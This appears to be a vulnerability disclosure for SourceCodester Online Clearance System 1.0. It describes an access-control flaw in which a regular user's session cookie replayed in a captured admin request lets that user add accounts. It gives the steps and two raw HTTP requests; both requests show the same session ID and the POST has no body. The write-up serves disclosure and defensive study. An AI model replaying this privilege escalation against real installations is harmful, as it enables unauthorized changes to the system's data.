### Critical Vulnerability Information - **Vulnerability Type**: Incorrect Access Control - **Affected Product**: SourceCodester Online Clearance System 1.0 - **Attack Type**: Remote #### Description SourceCodester Online Student Clearance System 1.0 contains a logical vulnerability that allows low-privileged users to forge high-privileged sessions and perform sensitive operations. #### Exploitation Steps 1. **Admin Login and Add User Information** - Log in to the system using an admin account. - Add new user information and capture the request packet. 2. **User Login and Capture Packet** - Open an incognito browser and log in as a regular user. - Capture the user’s request packet. 3. **Replace User Cookie in Admin Request** - Replace the admin request’s cookie with the user’s cookie and send the request. 4. **Verify Data Exists in Database** - The database confirms that the data has been successfully added. #### Example Code Snippets ```http POST /admin/add_user.php HTTP/1.1 Host: www.stu.com:81 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://www.stu.com/SV/cw.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2ogucjrwvtoefoingqe3ool Connection: close ``` ```http GET /index.php HTTP/1.1 Host: www.stu.com:81 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://www.stu.com/SV/cw.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2ogucjrwvtoefoingqe3ool Connection: close ```